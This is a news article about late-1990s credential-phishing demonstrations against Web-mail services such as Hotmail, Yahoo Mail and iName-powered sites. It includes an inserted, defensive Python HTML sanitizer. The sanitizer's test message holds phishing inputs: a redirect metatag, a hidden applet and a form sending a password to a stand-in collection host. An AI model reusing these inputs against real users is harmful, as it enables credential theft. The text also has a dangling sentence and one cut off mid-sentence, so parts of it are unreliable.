Just as Microsoft's Hotmail cleans up after a widely publicized security problem, free email providers across the Web are struggling to plug a host of similar, newly recognized holes.
Specialty Installations, the Canadian networking solutions provider whose password-stealing demonstration first drew attention to Hotmail's security woes, today posted another demo aimed at Yahoo Mail. While the first could fool users into handing over user names and passwords, the new demonstration used a Java applet to accomplish the same thing. The two languages are unrelated apart from their names.
Yahoo Mail, which uses its own proprietary technology, plugged its Java security hole hours after Specialty Installations posted its demonstration.
Sites that are vulnerable to the new Java applet exploit include Lycos Email, MailCity, Eudora Web-Mail, and MailExcite, according to Specialty Installations.
The Eudora mail service that is affected is Qualcomm's free Web-based service, not its popular desktop email application.
Hotmail is not vulnerable to the Java applet exploit. Nor is USA.net, which powers Netscape's WebMail, American Express's AmExMail, and USA.net's own NetAddress.
Specialty Installations has posted a chart listing so-called Trojan horses, or malicious exploits that masquerade as benign ones or insinuate themselves invisibly into the user experience.
Metatags are capable of transporting users to a spoofed "timed-out" page that could fool them into disclosing names and passwords.
Far more sites than those listed by Specialty Installations are vulnerable to the present exploit. iName, which powers the listed Lycos Email, also powers more than 40 other free email sites, including those branded by InfoSpace, Switchboard, Standard & Poor's, CBS Sportsline, CNN, Time Warner, AltaVista, Lexis-Nexis, the Oakland Raiders, and Lycos's search and directory sites for the United Kingdom, Germany, and Italy.
iName will also power free email for search and directory site Snap. That email service will launch in the third week of September, according to iName. (Snap is a joint venture between NBC and CNET: The Computer Network, publisher of News.com.)
"iName is aware of the metatags and Java applets issues and is currently working on a fix for those," said Peter Hamlen, vice president of software development at iName. "We also believe the problem is more pervasive than Because-We-Can's list of four problems suggests, and we are coming up with a more complete solution."
Because-We-Can is a group within Specialty Installations devoted to
nonprofit programming efforts. Web programmer Tom Cervenka, who goes
Hamlen said iName would release its fix on Monday. He said it would include filters for browser plug-ins such as Macromedia's Flash as well as Microsoft's ActiveX controls and VBScripts, all of which could be accomplices in a Trojan horse attack.
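The filtering design that the article describes as the weak point, and that iName's fix is said to add, comes down to what a Web-mail site lets through when it renders an HTML message. The following is an added example, not code from iName, WhoWhere or Specialty Installations: an allowlist filter for message bodies that drops tags able to run active content or redirect the reader (applets, scripts, objects, metatags, forms, plug-in embeds), strips event-handler attributes and `javascript:` links, and records what it removed so the service can log attempts. The sample message and all names (`MailSanitizer`, `sanitize`, `safe_url`, the `example.invalid` hosts) are constructed for this illustration.

```python
"""Allowlist HTML filter for Web-mail rendering (added example, not a provider's own code)."""
from html.parser import HTMLParser
import html

# Tags a message may keep; anything else is dropped. Tags in CONTAINER_DROP
# have their contents swallowed too (applet parameters, script source, ...).
ALLOWED = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
           "blockquote", "pre", "div", "span", "table", "tr", "td", "th"}
CONTAINER_DROP = {"script", "style", "applet", "object", "iframe"}
ALLOWED_ATTRS = {"a": {"href"}, "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


def safe_url(value):
    """True for relative URLs and for http/https/mailto; rejects javascript:, data:, etc.
    Whitespace and control characters are removed first so 'java\\nscript:' is caught."""
    v = "".join(ch for ch in (value or "") if ord(ch) > 0x20).lower()
    head = v.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True  # no scheme before the first path separator: relative URL
    return head.split(":", 1)[0] + ":" in SAFE_SCHEMES


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []       # sanitized HTML fragments
        self.dropped = []   # tags and attributes removed, for logging/detection
        self._skip_tag = None  # container currently being swallowed
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth += 1
            return
        if tag not in ALLOWED:
            self.dropped.append(tag)
            if tag in CONTAINER_DROP:
                self._skip_tag, self._skip_depth = tag, 1
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            # on* handlers and non-allowlisted attributes go; hrefs must use a safe scheme
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()) \
                    or (name == "href" and not safe_url(value)):
                self.dropped.append("%s@%s" % (tag, name))
                continue
            kept.append((name, value or ""))
        attr_text = "".join(' %s="%s"' % (n, html.escape(v, quote=True)) for n, v in kept)
        self.out.append("<%s%s>" % (tag, attr_text))

    def handle_endtag(self, tag):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth -= 1
                if self._skip_depth == 0:
                    self._skip_tag = None
            return
        if tag in ALLOWED:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip_tag:
            self.out.append(html.escape(data, quote=False))  # re-escape decoded text


def sanitize(html_body):
    """Return (sanitized_html, list_of_dropped_items)."""
    p = MailSanitizer()
    p.feed(html_body)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample: a message that mimics a "timed-out" login page and tries
# to redirect, load an applet and hand a password form to a third-party host.
SAMPLE_MAIL = (
    '<p>Hi, <b>your session</b> has expired.</p>'
    '<meta http-equiv="refresh" content="0;url=http://example.invalid/timedout">'
    '<applet code="Grab.class" width="1" height="1"><param name="x" value="1"></applet>'
    '<form action="http://example.invalid/collect"><input name="pw"></form>'
    '<a href="javascript:run()" onclick="run()">Re-login</a>'
    '<a href="https://example.invalid/help">Help</a>'
    '<script>document.forms[0].submit()</script>'
)

if __name__ == "__main__":
    clean, removed = sanitize(SAMPLE_MAIL)
    print(clean)
    print("dropped:", removed)
```

The `dropped` list is the detection hook: a provider that logs which messages carried applet, script or metatag elements can see an exploit campaign against its users before any password is disclosed, which is the kind of "more complete solution" Hamlen describes rather than a fix for four listed problems.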
WhoWhere, whose Webmail technology powers MailExcite and MailCity, said the Java applet security holes affected its sites and said it was testing a fix that would be ready within 24 hours.
Other sites with WhoWhere-powered email include ZDNet, TheGlobe.com, NetNoir, and the Oakland Athletics.
Specialty Installations' Cervenka said, as he has on the subject of his other exploit, that he designed the present one to warn companies and the public about the security hazards of Web-based email.
"We're not trying to use this as an illustration that there's a problem with Java applets in general, but rather that there's a problem with the user interface or filtering design of the Web-based email services," Cervenka said. "I think once people see this chart we made, they will have a good idea of how good the players are. There are some strong ones, some that are totally vulnerable, and some in-between. It's a nice spread."